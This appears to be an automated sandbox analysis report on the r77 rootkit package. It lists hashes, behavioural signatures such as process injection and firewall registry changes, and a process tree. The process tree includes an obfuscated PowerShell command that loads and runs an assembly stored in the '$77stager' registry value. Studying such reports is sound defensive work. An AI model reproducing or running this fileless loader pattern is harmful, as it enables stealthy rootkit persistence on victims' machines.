Overview
overview
10Static
static
3$77-Example.exe
windows7-x64
1$77-Example.exe
windows10-2004-x64
1BytecodeApi.UI.dll
windows7-x64
1BytecodeApi.UI.dll
windows10-2004-x64
1BytecodeApi.dll
windows7-x64
1BytecodeApi.dll
windows10-2004-x64
1Helper32.dll
windows7-x64
3Helper32.dll
windows10-2004-x64
3Helper64.dll
windows7-x64
1Helper64.dll
windows10-2004-x64
1Install.exe
windows7-x64
10Install.exe
windows10-2004-x64
10TestConsole.exe
windows7-x64
3TestConsole.exe
windows10-2004-x64
3r77-x64.dll
windows7-x64
1r77-x64.dll
windows10-2004-x64
1r77-x86.dll
windows7-x64
3r77-x86.dll
windows10-2004-x64
3Analysis
-
max time kernel
150s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
29/10/2024, 00:10
Static task
static1
Behavioral task
behavioral1
Sample
$77-Example.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
$77-Example.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
BytecodeApi.UI.dll
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
BytecodeApi.UI.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
BytecodeApi.dll
Resource
win7-20241023-en
Behavioral task
behavioral6
Sample
BytecodeApi.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
Helper32.dll
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
Helper32.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
Helper64.dll
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
Helper64.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
Install.exe
Resource
win7-20241023-en
Behavioral task
behavioral12
Sample
Install.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
TestConsole.exe
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
TestConsole.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
r77-x64.dll
Resource
win7-20241010-en
Behavioral task
behavioral16
Sample
r77-x64.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
r77-x86.dll
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
r77-x86.dll
Resource
win10v2004-20241007-en
General
-
Target
Install.exe
-
Size
163KB
-
MD5
1a7d1b5d24ba30c4d3d5502295ab5e89
-
SHA1
2d5e69cf335605ba0a61f0bbecbea6fc06a42563
-
SHA256
b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
-
SHA512
859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa
-
SSDEEP
3072:TQpsSyjlzA664oL8tIoDJxGtIVORPrdAHjl3+uwF+iBDZ/wXxnTFKe8kaz:TQpsSyjlzfnoNGxGo6PrdAHwtMxn4e8N
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2676 created 432 2676 powershell.EXE 5 -
pid Process 2676 powershell.EXE -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2676 set thread context of 2428 2676 powershell.EXE 33 -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 20a589189729db01 powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2676 powershell.EXE 2676 powershell.EXE 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe 2428 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2676 powershell.EXE Token: SeDebugPrivilege 2676 powershell.EXE Token: SeDebugPrivilege 2428 dllhost.exe Token: SeAuditPrivilege 832 svchost.exe -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 2056 wrote to memory of 2676 2056 taskeng.exe 31 PID 2056 wrote to memory of 2676 2056 taskeng.exe 31 PID 2056 wrote to memory of 2676 2056 taskeng.exe 31 PID 2676 wrote to memory of 2428 2676 powershell.EXE 33 PID 2676 wrote to memory of 2428 2676 powershell.EXE 33 PID 2676 wrote to memory of 2428 2676 powershell.EXE 33 PID 2676 wrote to memory of 2428 2676 powershell.EXE 33 PID 2676 wrote to memory of 2428 2676 powershell.EXE 33 PID 2676 wrote to memory of 2428 2676 powershell.EXE 33 PID 2676 wrote to memory of 2428 2676 powershell.EXE 33 PID 2676 wrote to memory of 2428 2676 powershell.EXE 33 PID 2676 wrote to memory of 2428 2676 powershell.EXE 33 PID 2428 wrote to memory of 432 2428 dllhost.exe 5 PID 2428 wrote to memory of 476 2428 dllhost.exe 6 PID 2428 wrote to memory of 484 2428 dllhost.exe 7 PID 2428 wrote to memory of 496 2428 dllhost.exe 8 PID 2428 wrote to memory of 588 2428 dllhost.exe 9 PID 2428 wrote to memory of 664 2428 dllhost.exe 10 PID 2428 wrote to memory of 740 2428 dllhost.exe 11 PID 2428 wrote to memory of 804 2428 dllhost.exe 12 PID 2428 wrote to memory of 832 2428 dllhost.exe 13 PID 2428 wrote to memory of 956 2428 dllhost.exe 15 PID 2428 wrote to memory of 236 2428 dllhost.exe 16 PID 2428 wrote to memory of 1040 2428 dllhost.exe 17 PID 2428 wrote to memory of 1068 2428 dllhost.exe 18 PID 2428 wrote to memory of 1080 2428 dllhost.exe 19 PID 2428 wrote to memory of 1100 2428 dllhost.exe 20 PID 2428 wrote to memory of 1156 2428 dllhost.exe 21 PID 2428 wrote to memory of 2024 2428 dllhost.exe 23 PID 2428 wrote to memory of 1444 2428 dllhost.exe 24 PID 2428 wrote to memory of 1600 2428 dllhost.exe 25 PID 2428 wrote to memory of 2488 2428 dllhost.exe 26 PID 2428 wrote to memory of 684 2428 dllhost.exe 27 PID 2428 wrote to memory of 2056 2428 dllhost.exe 30 PID 2428 wrote to memory of 2676 2428 dllhost.exe 31 PID 2428 wrote to memory of 904 2428 dllhost.exe 32
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:432
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{45887919-c1be-4177-96d7-cf6313b4fec4}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2428
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:476
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:588
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:2024
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe3⤵PID:1600
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:664
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
PID:740
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:804
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1040
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Suspicious use of AdjustPrivilegeToken
PID:832 -
C:\Windows\system32\taskeng.exetaskeng.exe {844D3ACD-7A87-4295-B849-62E7A4F2060C} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](36)+''+'7'+'7'+'s'+''+[Char](116)+''+'a'+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2676
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:956
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:236
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1068
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:1080
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1156
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:1444
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:2488
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:684
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:484
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:496
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1100
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵
- System Location Discovery: System Language Discovery
PID:1988
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1785456332-1656513609-724233238-11595301001824375607-9269215121953002610-1087009275"1⤵PID:904